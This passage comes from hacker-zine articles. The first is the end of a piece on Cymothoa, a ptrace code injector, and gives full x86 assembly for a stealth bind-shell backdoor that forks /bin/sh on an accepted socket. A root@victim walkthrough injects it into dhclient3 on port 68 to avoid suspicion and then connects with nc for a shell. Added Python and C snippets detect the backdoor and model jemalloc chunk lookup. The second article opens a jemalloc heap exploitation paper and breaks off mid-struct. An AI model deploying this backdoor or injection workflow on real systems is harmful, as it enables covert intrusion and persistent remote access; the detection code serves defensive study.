	# call to sys_fcntl(socket, F_GETFL)
	mov     %eax, %ebx
	xorl    %eax, %eax
	mov     $55, %al
	xorl    %ecx, %ecx
	mov     $3, %cl
	int     $0x80
	# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
	mov     %eax, %edx
	xorl    %eax, %eax
	mov     $55, %al
	mov     $4, %cl
	orl     $0x800, %edx  # O_NONBLOCK (nonblocking socket)
	int     $0x80

bind_call:
	# prepare sys_socketcall (bind) arguments
	jmp     struct_sockaddr
load_sockaddr:
	pop     %ecx
	push    $0x10   # sizeof(struct_sockaddr)
	push    %ecx    # struct_sockaddr address
	push    %ebx    # socket descriptor

	# call to sys_socketcall($0x02 (bind), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x02, %bl
	mov     %esp, %ecx
	int     $0x80
	jmp     listen_call

struct_sockaddr:
	call load_sockaddr
	.short	0x02	# AF_INET
	.short	0x5250	# PORT (replaced by the injector)
	.long	0x00	# INADDR_ANY

listen_call:
	pop     %eax    # socket descriptor
	pop     %ebx
	push    $0x10   # queue (backlog)
	push    %eax    # socket descriptor

	# call to sys_socketcall($0x04 (listen), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x04, %bl
	mov     %esp, %ecx
	int     $0x80

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

accept_call:
	# prepare sys_socketcall (accept) arguments
	xorl    %ecx, %ecx
	push    %ecx         # socklen_t *addrlen
	push    %ecx         # struct sockaddr *addr
	add     $4, %esi
	push    (%esi)       # socket descriptor

	# call to sys_socketcall($0x05 (accept), *args)
	xorl    %eax, %eax
	mov     $102, %al
	xorl    %ebx, %ebx
	mov     $0x05, %bl
	mov     %esp, %ecx
	int     $0x80       # %eax = file descriptor or negative (on error)
	mov     %eax, %edx  # save file descriptor

	# restore stack
	pop     %edi
	pop     %edi
	pop     %edi

	# check return value
	test    %eax, %eax
	js      schedule_next_and_return  # jump on error (negative %eax)


fork_child:
	# call to sys_fork()
	xorl    %eax, %eax
	mov     $2, %al
	int     $0x80

	test    %eax, %eax
	jz      dup2_multiple_calls  # child continue execution
	                             # parent schedule_next_and_return

schedule_next_and_return:

	# call to sys_close(socket file descriptor)
	# (since is used only by the child process)
	xorl    %eax, %eax
	mov     $6, %al
	mov     %edx, %ebx
	int     $0x80

	# call to sys_waitpid(-1, NULL, WNOHANG)
	# (to remove zombie processes)
	xorl    %eax, %eax
	mov     $7, %al
	xorl    %ebx, %ebx
	dec     %ebx
	xorl    %ecx, %ecx
	xorl    %edx, %edx
	mov     $1, %dl
	int     $0x80

	# alarm(timeout)
	xorl    %eax, %eax
	mov     $27, %al
	movl    $0x53434553, %ebx    # replaced by the injector (seconds)
	int     $0x80

	# return
	popa
	ret

dup2_multiple_calls:
	# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
	xorl    %eax, %eax
	xorl    %ecx, %ecx
	mov     %edx, %ebx
	mov     $2, %cl
dup2_loop:
	mov     $63, %al
	int     $0x80
	dec     %ecx
	jns     dup2_loop

execve_call:
	# call to sys_execve(program, *args)
	xorl    %eax, %eax
	mov     $11, %al
	jmp     program_path
load_program_path:
	pop     %ebx
	# create argument list [program_path, NULL]
	xorl    %ecx, %ecx
	push    %ecx
	push    %ebx
	mov     %esp, %ecx
	mov	%esp, %edx
	int     $0x80

program_path:
	call load_program_path
	.ascii  "/bin/sh"

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

A little summary of the code:
1) Half preamble, only the signal() part.
2) Check to see if it's the first execution. This step makes use of a
   persistent memory location, provided by the injector.
2.1) If already initialized jump to 7
2.2) If not initialized continue
3) Open socket.
4) Set nonblocking using fcntl().
5) Bind socket to the specified port.
6) Socket in listen mode with listen().
7) Check if a client is connected using accept().
7.1) No clients, jump to 9
7.2) Client connected, continue
8) Fork() a child process and execute a shell.
9) Set the timer and resume host execution
   (the second half of the preamble)

For this shellcode the provided arguments are a persistent memory
address, the port to listen on and the timer (in seconds).

Finally, let's see a practical example of use.

First, we must identify our host process. We also need to find a port that
is not likely to arouse suspicion.

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc

Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
good strategy for our backdoor is to listen on port 68/TCP...

root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
[+] attaching to process 1612

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffdfe   ebx value: 0x6
 esp value: 0xbfff6dd0   eip value: 0xb7682430
 ------------------------------------------------------------

[+] new esp: 0xbfff6dcc
[+] injecting code into 0xb7683000
[+] copy general purpose registers
[+] persistent memory at 0xb769f000 (if used)
[+] detaching from 1612

[+] infected!!!

Let's see the result:

root@victim# lsof -a -i -c dhclient3
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
dhclient3 1612 root    7u  IPv4  21892      0t0  TCP *:bootpc (LISTEN)

As you can see it is very difficult to see that something is wrong...

Now the attacker can connect to the victim and get a shell:

root@attacker# nc -vv victim_ip 68
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
uname -a
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux

We have achieved our goal: a single process backdoor :)
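
As an added example (not part of the original article or of cymothoa): the
extra socket blends in visually, but it is a new TCP listener on a PID that
previously held only UDP sockets, which is easy to flag mechanically. The
baseline table and all function names are assumptions; the two sample
listings are constructed from the lsof output shown above.

```python
from typing import NamedTuple


class Sock(NamedTuple):
    command: str
    pid: int
    proto: str   # lsof NODE column for internet sockets: "TCP" or "UDP"
    name: str    # lsof NAME column, e.g. "*:bootpc"
    state: str   # "LISTEN" for a listening TCP socket, "" otherwise


# Constructed sample input: the two `lsof -a -i -c dhclient3` listings
# from the article, taken before and after the injection.
BEFORE = """\
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
"""
AFTER = BEFORE + (
    "dhclient3 1612 root    7u  IPv4  21892      0t0  TCP *:bootpc (LISTEN)\n"
)

# Assumed site baseline: transport protocols each daemon is expected to use.
BASELINE = {"dhclient3": {"UDP"}}


def parse_lsof(text):
    """Return the set of internet sockets found in `lsof -i` style output."""
    socks = set()
    for line in text.splitlines():
        f = line.split()
        # Skip the header, short lines and anything that is not TCP/UDP.
        if len(f) < 9 or not f[1].isdigit() or f[7] not in ("TCP", "UDP"):
            continue
        state = f[9].strip("()") if len(f) > 9 else ""
        # FD and DEVICE are left out on purpose: they change between runs.
        socks.add(Sock(f[0], int(f[1]), f[7], f[8], state))
    return socks


def new_on_existing_pids(before, after):
    """Sockets that appeared on a PID that was already running before."""
    known = {(s.command, s.pid) for s in before}
    return sorted(s for s in after - before if (s.command, s.pid) in known)


def off_baseline(socks, baseline):
    """Sockets whose protocol is not expected for that command."""
    return sorted(
        s for s in socks
        if s.command in baseline and s.proto not in baseline[s.command]
    )


if __name__ == "__main__":
    before, after = parse_lsof(BEFORE), parse_lsof(AFTER)
    for s in new_on_existing_pids(before, after):
        print("new socket on long-running pid:", s)
    for s in off_baseline(after, BASELINE):
        print("protocol outside baseline:     ", s)
```

Both checks rely on a snapshot or baseline taken while the host was known
to be clean; a port name that matches the service is not evidence by itself.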

------[ 6. Something about the injector

In all these examples we always used the injector cymothoa [3].
Some notes about this tool...

The injector is very important because it allows the customization of the
shellcode and its injection in the right areas of memory.

Cymothoa is meant to be an aid to developing shellcode, in several ways.

In the payloads directory there are all the assembly sources created by the
author, easily compilable with gcc:

root@box# cd payloads
root@box# ls
clone_shellcode.s            fork_shellcode.s
scheduled_backdoor_alarm.s   mmx_example_shellcode.s
scheduled_setitimer.s        scheduled_alarm.s
scheduled_tail_setitimer.s
root@box# gcc -c scheduled_backdoor_alarm.s
root@box#

Cymothoa also includes some tools to easily extract the shellcode from
these object files.

For example bgrep [6], a binary grep, which finds the offset of
particular hexadecimal sequences:

root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
payloads/scheduled_backdoor_alarm.o: 0000014b

This is useful for finding the beginning of the code to extract.

Once you locate the beginning and the length of the code, you can easily
turn it into a C string with the script hexdump_to_cstring.pl.

root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
          ./hexdump_to_cstring.pl
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
...

Once this is done you can add this string to the file payloads.h, and
recompile cymothoa, to have a new, ready to inject, parasite.

If you want to turn code you already have into a parasite, that's the
easy way.
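
As an added example (not part of the original article or of cymothoa): the
bytes in the hexdump above contain the "already initialized" check
(mov $imm32,%esi ; mov (%esi),%eax ; cmp $0xdeadbeef,%eax), which gives
a byte signature for these payloads both as an unpatched template and
after the injector has replaced the 0x4d454d50 marker. The function
names are assumptions; the sample buffers are constructed from the hexdump
and from the persistent memory address printed in section 5.3.

```python
import re
import struct
import sys

# First 54 bytes of the hexdump_to_cstring.pl output quoted in the article.
PAGE_BYTES = bytes.fromhex(
    "6031c031dbb030b30eeb085983e918cd80eb"
    "05e8f3ffffffbe504d454d8b063defbeadde"
    "0f848100000031c0b06631dbb301eb1459cd"
)

# Marker that, according to the payload comments, the injector replaces
# with the persistent memory address.
TEMPLATE_MARK = 0x4D454D50

# be <imm32>      mov  $imm32, %esi
# 8b 06           mov  (%esi), %eax
# 3d ef be ad de  cmp  $0xdeadbeef, %eax
# The four immediate bytes are a wildcard so that patched copies match too.
INIT_CHECK = re.compile(rb"\xbe(.{4})\x8b\x06\x3d\xef\xbe\xad\xde", re.DOTALL)

# Constructed samples: the template as it would sit in a file, and the same
# bytes with the marker replaced by the address shown in the 5.3 session
# ("persistent memory at 0xb769f000").
ON_DISK = b"\x00" * 16 + PAGE_BYTES
IN_MEMORY = ON_DISK.replace(
    struct.pack("<I", TEMPLATE_MARK), struct.pack("<I", 0xB769F000)
)


def scan(buf):
    """Return (offset, state, imm32) for every init-check sequence in buf.

    state is "template" when the marker is still in place and "patched"
    when it has been replaced by some other 32-bit value.
    """
    hits = []
    for m in INIT_CHECK.finditer(buf):
        (imm,) = struct.unpack("<I", m.group(1))
        state = "template" if imm == TEMPLATE_MARK else "patched"
        hits.append((m.start(), state, imm))
    return hits


def scan_file(path):
    """Scan one file (an object file, a binary or a memory dump)."""
    with open(path, "rb") as fh:
        return scan(fh.read())


if __name__ == "__main__":
    # With arguments: scan the named files. Without: scan the samples.
    targets = sys.argv[1:]
    if targets:
        results = [(p, scan_file(p)) for p in targets]
    else:
        results = [("ON_DISK", scan(ON_DISK)), ("IN_MEMORY", scan(IN_MEMORY))]
    for name, hits in results:
        for off, state, imm in hits:
            print(f"{name}: offset 0x{off:x} {state} imm=0x{imm:08x}")
```

The signature is tied to the exact instruction encoding of the payloads
shown in this article; a payload assembled differently will not match.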

The last thing I want to mention about cymothoa, is a little utility
shipped with the main tool: a syscall code generator.

Writing syscall based shellcodes can be tedious work, especially if
you must remember every syscall number and its parameters.

Since I am a lazy person, I've written a script able to do part of
the hard work:

root@box# ./syscall_code.pl
Syscall shellcode generator
Usage:
        ./syscall_code.pl syscall

For example you can use it to generate the calling sequence for the
open syscall:

root@box# ./syscall_code.pl sys_open
sys_open_call:
        # call to sys_open(filename, flags, mode)
        xorl    %eax, %eax
        mov     $5, %al
        xorl    %ebx, %ebx
        mov     filename, %bl
        xorl    %ecx, %ecx
        mov     flags, %cl
        xorl    %edx, %edx
        mov     mode, %dl
        int     $0x80

As you can see the script generates assembly code that marks arguments and
corresponding registers of the syscall, as well as the call number.

The code is not always 100% reliable (e.g. some syscalls require complex
structures the script is not able to construct), but it can greatly speed
up the shellcode development phase.

I hope you'll find it useful...

------[ 7. Further reading

While I was writing this article, the talks which will take place during
the next edition were published on the defcon website.

One of these caught my attention [7]:

     Jugaad - Linux Thread Injection Kit

   "... The kit currently works on Linux, allocates space inside
    a process and injects and executes arbitrary payload as a
    thread into that process. It utilizes the ptrace() functionality
    to manipulate other processes on the system. ptrace() is an API
    generally used by debuggers to manipulate(debug) a program.
    By using the same functionality to inject and manipulate the
    flow of execution of a program Jugaad is able to inject the
    payload as a thread."

I recommend that all readers who found this article interesting follow
this talk, because it is similar research, parallel to mine.

My goal was to implement a stealth backdoor without creating new processes
or threads, while the research of Aseem focuses on the creation of threads,
to achieve the same level of stealthiness.

I therefore offer my best wishes to Aseem, since I think our works are
complementary.

For additional material on "injection of code" you can see the links
listed at the end of the document.

Bye bye ppl ;)

Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
sugar, renaud, bt_smarto, cris.

------[ 8. Links and references

[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
    (5 - The dynamic linker's dl-resolve() function)
[3] http://vxheavens.com/lib/vrn00.html#c42
[4] http://cymothoa.sourceforge.net/
[5] http://www.exploit-db.com/exploits/13388/
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar

------[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[    argp | huku    ]=------------------------=|
|=--------------------=[  {argp,huku}@grhack.net  ]=---------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

1 - Introduction
  1.1 - Thousand-faced jemalloc
2 - jemalloc memory allocator overview
  2.1 - Basic structures
    2.1.1 - Chunks (arena_chunk_t)
    2.1.2 - Arenas (arena_t)
    2.1.3 - Runs (arena_run_t)
    2.1.4 - Regions/Allocations
    2.1.5 - Bins (arena_bin_t)
    2.1.6 - Huge allocations
    2.1.7 - Thread caches (tcache_t)
    2.1.8 - Unmask jemalloc
  2.2 - Algorithms
3 - Exploitation tactics
  3.1 - Adjacent region corruption
  3.2 - Heap manipulation
  3.3 - Metadata corruption
    3.3.1 - Run (arena_run_t)
    3.3.2 - Chunk (arena_chunk_t)
    3.3.3 - Thread caches (tcache_t)
4 - A real vulnerability
5 - Future work
6 - Conclusion
7 - References
8 - Code

--[ 1 - Introduction

In this paper we investigate the security of the jemalloc allocator
in both theory and practice. We are particularly interested in the
exploitation of memory corruption bugs, so our security analysis will
be biased towards that end.

jemalloc is a userland memory allocator. It provides an implementation
for the standard malloc(3) interface for dynamic memory management. It
was written by Jason Evans (hence the 'je') for FreeBSD since there
was a need for a high performance, SMP-enabled memory allocator for
libc. After that, jemalloc was also used by the Mozilla Firefox browser
as its internal dedicated custom memory allocator.

All the above have led to a few versions of jemalloc that are very
similar but not exactly the same. To summarize, there are three different
widely used versions of jemalloc: 1) the standalone version [JESA],
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
FreeBSD libc [JEFB] version.

The exploitation vectors we investigate in this paper have been tested
on the jemalloc versions presented in subsection 1.1, all on the x86
platform. We assume basic knowledge of x86 and a general familiarity
with userland malloc() implementations, however these are not strictly
required.


----[ 1.1 - Thousand-faced jemalloc

There are so many different jemalloc versions that we almost went crazy
double checking everything in all possible platforms. Specifically, we
tested the latest standalone jemalloc version (2.2.3 at the time of this
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
tested the Linux port of the FreeBSD malloc(3) implementation
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].


--[ 2 - jemalloc memory allocator overview

The goal of this section is to provide a technical overview of the
jemalloc memory allocator. However, it is not all-inclusive. We will only
focus on the details that are useful for understanding the exploitation
attacks against jemalloc analyzed in the next section. The interested
reader can look in [JE06] for a more academic treatment of jemalloc
(including benchmarks, comparisons with other allocators, etc).

Before we start our analysis we would like to point out that jemalloc (as
well as other malloc implementations) does not implement concepts like
'unlinking' or 'frontlinking' which have proven to be catalytic for the
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
would like to stress the fact that the attacks we are going to present do
not directly achieve a write-4-anywhere primitive. We, instead, focus on
how to force malloc() (and possibly realloc()) to return a chunk that will
most likely point to an already initialized memory region, in hope that
the region in question may hold objects important for the functionality
of the target application (C++ VPTRs, function pointers, buffer sizes and
so on). Considering the various anti-exploitation countermeasures present
in modern operating systems (ASLR, DEP and so on), we believe that such
an outcome is far more useful for an attacker than a 4 byte overwrite.

jemalloc, as a modern memory allocator should, recognizes that minimal
page utilization is no longer the most critical feature. Instead it
focuses on enhanced performance in retrieving data from the RAM. Based
on the principle of locality which states that items that are allocated
together are also used together, jemalloc tries to situate allocations
contiguously in memory. Another fundamental design choice of jemalloc is
its support for SMP systems and multi-threaded applications by trying
to avoid lock contention problems between many simultaneously running
threads. This is achieved by using many 'arenas' and the first time a
thread calls into the memory allocator (for example by calling malloc(3))
it is associated with a specific arena. The assignment of threads to
arenas happens with three possible algorithms: 1) with a simple hashing
on the thread's ID if TLS is available, 2) with a simple builtin linear
congruential pseudo random number generator in case MALLOC_BALANCE is
defined and TLS is not available, 3) or with the traditional round-robin
algorithm. For the latter two cases, the association between a thread
and an arena doesn't stay the same for the whole life of the thread.

Continuing our high-level overview of the main jemalloc structures
before we dive into the details in subsection 2.1, we have the concept of
'chunks'. jemalloc divides memory into chunks, always of the same size,
and uses these chunks to store all of its other data structures (and
user-requested memory as well). Chunks are further divided into 'runs'
that are responsible for requests/allocations up to certain sizes. A run
keeps track of free and used 'regions' of these sizes. Regions are the
heap items returned on user allocations (e.g. malloc(3) calls). Finally,
each run is associated with a 'bin'. Bins are responsible for storing
structures (trees) of free regions.

The following diagram illustrates in an abstract manner the relationships
between the basic building blocks of jemalloc.

  Chunk #0                           Chunk #1
.--------------------------------. .--------------------------------.
|                                | |                                |
|   Run #0         Run #1        | |   Run #0         Run #1        |
| .-------------..-------------. | | .-------------..-------------. |
| |             ||             | | | |             ||             | |
| |   Page      ||   Page      | | | |   Page      ||   Page      | |
| | .---------. || .---------. | | | | .---------. || .---------. | |
| | |         | || |         | | | | | |         | || |         | | | ...
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
| | | ^     ^ | || |         | | | | | | ^     ^ | || |         | | |
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
`-----|-----|--------------------' `-----|-----|--------------------'
      |     |                            |     |
      |     |                            |     |
  .---|-----|----------.             .---|-----|----------.
  |   |     |          |             |   |     |          |
  | free regions' tree | ...         | free regions' tree | ...
  |                    |             |                    |
  `--------------------'             `--------------------'
  bin[Chunk #0][Run #0]              bin[Chunk #1][Run #0]


----[ 2.1 - Basic structures

In the following paragraphs we analyze in detail the basic jemalloc
structures. Familiarity with these structures is essential in order to
begin our understanding of the jemalloc internals and proceed to the
exploitation step.


------[ 2.1.1 - Chunks (arena_chunk_t)

If you are familiar with Linux heap exploitation (and more precisely with
dlmalloc internals) you have probably heard of the term 'chunk' before. In
dlmalloc, the term 'chunk' is used to denote the memory regions returned
by malloc(3) to the end user. We hope you get over it soon because when it
comes to jemalloc the term 'chunk' is used to describe big virtual memory
regions that the memory allocator conceptually divides available memory
into. The size of the chunk regions may vary depending on the jemalloc
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
highest abstraction used in jemalloc's design; that is, the rest of the
structures described in the following paragraphs are actually placed within
a chunk somewhere in the target's memory.

The following are the chunk sizes in the jemalloc variants we have
examined:

                +---------------------------------------+
                | jemalloc variant         | Chunk size |
                +---------------------------------------+
                | FreeBSD 8.2-RELEASE      |    1 MB    |
                -----------------------------------------
                | Standalone v2.2.3        |    4 MB    |
                -----------------------------------------
                | jemalloc_linux_20080828a |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v5.0     |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v7.0.1   |    1 MB    |
                -----------------------------------------
                | Mozilla Firefox v11.0    |    1 MB    |
                -----------------------------------------

An area of jemalloc managed memory divided into chunks looks like the
following diagram. We assume a chunk size of 4 MB; remember that chunks are
aligned to their size. The address 0xb7000000 does not have a particular
significance apart from illustrating the offsets between each chunk.

+-------------------------------------------------------------------------+
|         Chunk alignment        |             Chunk content              |
+-------------------------------------------------------------------------+
| Chunk #1 starts at: 0xb7000000 [  Arena                                 ]
| Chunk #2 starts at: 0xb7400000 [  Arena                                 ]
| Chunk #3 starts at: 0xb7800000 [  Arena                                 ]
| Chunk #4 starts at: 0xb7c00000 [  Arena                                 ]
| Chunk #5 starts at: 0xb8000000 [  Huge allocation region, see below     ]
| Chunk #6 starts at: 0xb8400000 [  Arena                                 ]
| Chunk #7 starts at: 0xb8800000 [  Huge allocation region                ]
| Chunk #8 starts at: 0xb8c00000 [  Huge allocation region                ]
| Chunk #9 starts at: 0xb9000000 [  Arena                                 ]
+-------------------------------------------------------------------------+

Huge allocation regions are memory regions managed by jemalloc chunks that 
satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc 
also has the small/medium and large size classes for end user allocations 
(both managed by arenas). We analyze jemalloc's size classes of regions in 
subsection 2.1.4.

Chunks are described by 'arena_chunk_t' structures (taken from the
standalone version of jemalloc; we have added and removed comments in
order to make things clearer):


[2-1]

typedef struct arena_chunk_s arena_chunk_t;
struct arena_chunk_s
{
    /* The arena that owns this chunk. */
    arena_t *arena;

    /* A list of the corresponding arena's dirty chunks. */
    ql_elm(arena_chunk_t) link_dirty;

    /* 
     * Whether this chunk contained at some point one or more dirty pages.
     */
    bool dirtied;

    /* This chunk's number of dirty pages. */
    size_t ndirty;

    /*
     * A chunk map element corresponds to a page of this chunk. The map
     * keeps track of free and large/small regions.
     */
    arena_chunk_map_t map[];
};


The main use of chunk maps in combination with the memory alignment of the
chunks is to enable constant time access to the management metadata of free
and large/small heap allocations (regions).
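
The following added example (not part of the original article or of
jemalloc's source) models that lookup in C: because chunks are aligned to
their size, masking any region address yields the chunk header, and the page
offset within the chunk indexes the map. The toy_* names, the 4 KB page size
and the layout of the map element are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CHUNK_SIZE   ((size_t)4 << 20)          /* 4 MB, as in the diagram above */
#define CHUNK_MASK   ((uintptr_t)CHUNK_SIZE - 1)
#define PAGE_SHIFT   12                         /* assumption: 4 KB pages */
#define PAGE_SIZE    ((size_t)1 << PAGE_SHIFT)
#define CHUNK_NPAGES (CHUNK_SIZE >> PAGE_SHIFT)

enum { PAGE_FREE, PAGE_SMALL, PAGE_LARGE };

/* Toy stand-in for arena_chunk_map_t: one element per page of the chunk. */
typedef struct {
    uint8_t  state;             /* PAGE_FREE, PAGE_SMALL or PAGE_LARGE */
    uint32_t run_first_page;    /* first page of the run this page belongs to */
} toy_map_t;

/* Toy stand-in for arena_chunk_t: the header starts at the chunk base. */
typedef struct {
    size_t    ndirty;
    toy_map_t map[CHUNK_NPAGES];
} toy_chunk_t;

/* Chunks are aligned to their size, so clearing the low bits of any
 * address inside a chunk gives the address of the chunk header. */
uintptr_t chunk_base(uintptr_t addr) { return addr & ~CHUNK_MASK; }

/* Index of the page (and therefore of the map element) holding addr. */
size_t page_index(uintptr_t addr) { return (addr & CHUNK_MASK) >> PAGE_SHIFT; }

/* Get a chunk-aligned chunk by over-allocating and rounding up. The
 * pointer to hand to free() is returned through raw_out. */
toy_chunk_t *toy_chunk_new(void **raw_out)
{
    unsigned char *raw = malloc(2 * CHUNK_SIZE);
    toy_chunk_t *c;

    if (raw == NULL)
        return NULL;
    c = (toy_chunk_t *)(((uintptr_t)raw + CHUNK_MASK) & ~CHUNK_MASK);
    memset(c, 0, sizeof(*c));   /* every page starts out PAGE_FREE */
    *raw_out = raw;
    return c;
}

/* Record in the map that pages [first, first + npages) form one run. */
void toy_mark_run(toy_chunk_t *c, size_t first, size_t npages, uint8_t state)
{
    for (size_t i = first; i < first + npages; i++) {
        c->map[i].state = state;
        c->map[i].run_first_page = (uint32_t)first;
    }
}

/* Constant-time metadata lookup: no search, only a mask and a shift. */
const toy_map_t *toy_lookup(const void *ptr)
{
    uintptr_t a = (uintptr_t)ptr;
    const toy_chunk_t *c = (const toy_chunk_t *)chunk_base(a);

    return &c->map[page_index(a)];
}

/* Start address of the run that contains ptr. */
void *toy_run_start(const void *ptr)
{
    const toy_map_t *m = toy_lookup(ptr);

    return (unsigned char *)chunk_base((uintptr_t)ptr)
        + ((size_t)m->run_first_page << PAGE_SHIFT);
}

int main(void)
{
    void *raw;
    toy_chunk_t *c = toy_chunk_new(&raw);

    if (c == NULL)
        return 1;
    /* The toy header is a little over 8 KB, so runs start at page 3. */
    toy_mark_run(c, 3, 2, PAGE_SMALL);
    const unsigned char *p = (unsigned char *)c + 4 * PAGE_SIZE + 0x123;
    printf("chunk=%p page=%zu run=%p\n", (void *)chunk_base((uintptr_t)p),
        page_index((uintptr_t)p), toy_run_start(p));
    free(raw);
    return 0;
}
```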


------[ 2.1.2 - Arenas (arena_t)

An arena is a structure that manages the memory areas jemalloc divides
into chunks. Arenas can span more than one chunk, and depending on the
size of the chunks, more than one page as well. As we have already
mentioned, arenas are used to mitigate lock contention problems between
threads. Therefore, allocations and deallocations from a thread always
happen on the same arena. Theoretically, the number of arenas is in direct
relation to the need for concurrency in memory allocation. In practice the
number of arenas depends on the jemalloc variant we deal with. For example,
in Firefox's jemalloc there is only one arena. In the case of single-CPU
systems there is also only one arena. In SMP systems the number of arenas
is equal to either two (in FreeBSD 8.2) or four (in the standalone variant)
times the number of available CPU cores. Of course, there is always at
least one arena.

Debugging the standalone variant with gdb:


gdb $ print ncpus
$86 = 0x4
gdb $ print narenas
$87 = 0x10


Arenas are the central jemalloc data structures as they are used to manage
the chunks (and the underlying pages) that are responsible for the small
and large allocation size classes. Specifically, the arena structure is
defined as follows:


[2-2]

typedef struct arena_s arena_t;
struct arena_s
{
    /* This arena's index in the arenas array. */
    unsigned ind;

    /* Number of threads assigned to this arena. */
    unsigned nthreads;

    /* Mutex to protect certain operations. */
    malloc_mutex_t lock;

    /*
     * Chunks that contain dirty pages managed by this arena. When jemalloc
     * requires new pages these are allocated first from the dirty pages.
     */
    ql_head(arena_chunk_t) chunks_dirty;

    /*
     * Each arena has a spare chunk in order to cache the most recently
     * freed chunk.
     */
    arena_chunk_t *spare;

    /* The number of pages in this arena's active runs. */
    size_t nactive;

    /* The number of pages in unused runs that are potentially dirty. */
    size_t ndirty;

    /* The number of pages this arena's threads are attempting to purge. */
    size_t npurgatory;

    /* 
     * Ordered tree of this arena's available clean runs, i.e. runs
     * associated with clean pages.
     */
    arena_avail_tree_t runs_avail_clean;

    /*
     * Ordered tree of this arena's available dirty runs, i.e. runs
     * associated with dirty pages.
     */
    arena_avail_tree_t runs_avail_dirty;

    /* 
     * Bins are used to store structures of free regions managed by this
     * arena.
     */
    arena_bin_t bins[];
};


All in all a fairly simple structure. As is clear from the above
structure, the allocator contains a global array of arenas and an unsigned
integer representing the number of these arenas:


arena_t     **arenas;
unsigned    narenas;


And using gdb we can see the following:


gdb $ x/x arenas
0xb7800cc0: 0xb7800740
gdb $ print arenas[0]
$4 = (arena_t *) 0xb7800740
gdb $ x/x &narenas
0xb7fdfdc4 <narenas>:   0x00000010


At 0xb7800740 we have 'arenas[0]', that is the first arena, and at
0xb7fdfdc4 we have the number of arenas, i.e. 16.


------[ 2.1.3 - Runs (arena_run_t)

Runs are further subdivisions of the memory that jemalloc divides into
chunks. Runs exist only for small and large allocations (see
subsection 2.1.1), but not for huge allocations. In essence, a chunk
is broken into several runs. Each run is actually a set of one or more
contiguous pages (but a run cannot be smaller than one page). Therefore,
they are aligned to multiples of the page size. The runs themselves may
be non-contiguous but they are as close as possible due to the tree search
heuristics implemented by jemalloc.

The main responsibility of a run is to keep track of the state (i.e. free
or used) of end user memory allocations, or regions as these are called in
jemalloc terminology. Each run holds regions of a specific size (always
within the small and large size classes, as we have mentioned) and their
state is tracked with a bitmask. This bitmask is part of a run's metadata;
these metadata are defined with the following structure:


[2-3]

typedef struct arena_run_s arena_run_t;
struct arena_run_s
{
    /*
     * The bin that this run is associated with. See 2.1.5 for details on
     * the bin structures.
     */
    arena_bin_t *bin;
    
    /*
     * The index of the next region of the run that is free. On the FreeBSD
     * and Firefox flavors of jemalloc this variable is named regs_minelm.
     */
    uint32_t nextind;
    
    /* The number of free regions in the run. */
    unsigned nfree;

    /*
     * Bitmask for the regions in this run. Each bit corresponds to one
